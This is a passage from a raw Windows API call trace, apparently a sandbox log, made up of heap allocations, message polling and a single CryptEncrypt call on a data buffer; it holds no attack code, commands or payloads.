(in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e31) returned 0xe77cc8 [0266.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e31) returned 0xe8bb08 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe77cc8 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe8bb08 | out: hHeap=0x970000) returned 1 [0266.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.586] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0266.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0266.586] CryptEncrypt (in: hKey=0xa873d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe63e88*, pdwDataLen=0x8cef60*=0x13e31, dwBufLen=0x13e38 | out: pbData=0xe63e88*, pdwDataLen=0x8cef60*=0x13e38) returned 1 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0266.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0266.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0266.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0266.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0266.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0266.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0266.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0266.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0266.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e38) returned 0xe77cc8 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0266.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e38) returned 0xe8bb08 [0266.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe77cc8 | out: hHeap=0x970000) returned 1 [0266.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.597] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.597] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.597] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0266.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0266.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0266.597] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 